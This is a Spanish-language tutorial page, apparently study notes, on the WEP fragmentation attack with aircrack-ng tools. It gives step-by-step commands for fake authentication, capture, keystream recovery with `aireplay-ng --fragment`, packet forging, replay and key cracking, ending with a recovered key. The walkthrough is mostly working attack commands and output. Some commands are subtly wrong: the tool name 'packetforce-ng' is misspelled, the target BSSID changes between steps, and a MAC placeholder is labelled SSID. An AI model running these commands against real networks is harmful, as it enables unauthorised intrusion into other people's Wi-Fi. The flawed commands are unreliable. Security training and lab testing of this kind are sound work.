Page cover

🌐Fragmentation

El ataque de fragmentación es una técnica utilizada en la seguridad de redes inalámbricas para explotar vulnerabilidades en la implementación de la seguridad WEP.

Debemos ejecutar esta técnica hasta lograr los suficientes IVs para crackear la llave

Ataque de Fragmentación

  • En una red Wi-Fi que utiliza WEP para la seguridad, los paquetes de datos se dividen en fragmentos más pequeños antes de ser transmitidos.

  • El ataque de fragmentación implica manipular estos fragmentos para explotar debilidades en la implementación de WEP.

  • Usando este método debemos obtener 1500 bytes del PRGA.

Proceso

  • Identificación de IV débil: El atacante monitorea el tráfico de la red para identificar un flujo de paquetes cifrados con una clave WEP.

  • Solicitud de desautenticación: El atacante envía un paquete de desautenticación al cliente para forzarlo a reconectarse y generar nuevos vectores de inicialización (IV).

  • Ataque de fragmentación: El atacante envía fragmentos manipulados para explotar debilidades en la implementación WEP. Esto puede incluir fragmentos más cortos que los que se esperan.

1. Partimos de un Fake Auth

🌐Fake Autentication

2. Iniciar airodump-ng

Debemos guardar la salida con --write

# 4 - Iniciamos airodump-ng y guardamos la salida
sudo airodump-ng --bssid 00:E0:4C:6A:5A:F8 --channel 11 --write fragment_injection wlan0

3. Aireplay --fragment

sudo aireplay-ng --help

Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
   >> --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)
sudo aireplay-ng --fragment -b <SSID-OBJETIVO> -h <MAC-ADAPTADOR> <INTERFAZ> 
sudo aireplay-ng --fragment -b 00:E0:AC:6A:5A:F8 -h E8:4E:06:35:A9:C0 wlan0mon 

Al final obtendremos el keystream en un archivo .xor

4. Iniciar packetforce

sudo packetforce-ng -0 -a <MAC-OBJETIVO> -h <MAC-ADAPTADOR> -k <MASCARA> -l <MASCARA> -y <.XOR> -w <SALIDA>
sudo packetforce-ng -0 -a 00:E0:AC:6A:5A:F8 -h E8:4E:06:35:A9:C0 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1130-212229.xor -w fragment_attack

Wrote packet to: fragment_attack

ls
fragment_attack

5. Aireplay --interactive

sudo aireplay-ng --help

Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
   >> --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)
sudo aireplay-ng --interactive -r fragment_attack wlan0mon

Vemos que aumenta el tráfico correctamente en airodump:

6. Iniciar aircrack-ng

Abrir el archivo .cap

sudo aircrack-ng fragment_injection.cap
KEY FOUND! [12:34:56:78:90]
Password: 1234567890

Última actualización

¿Te fue útil?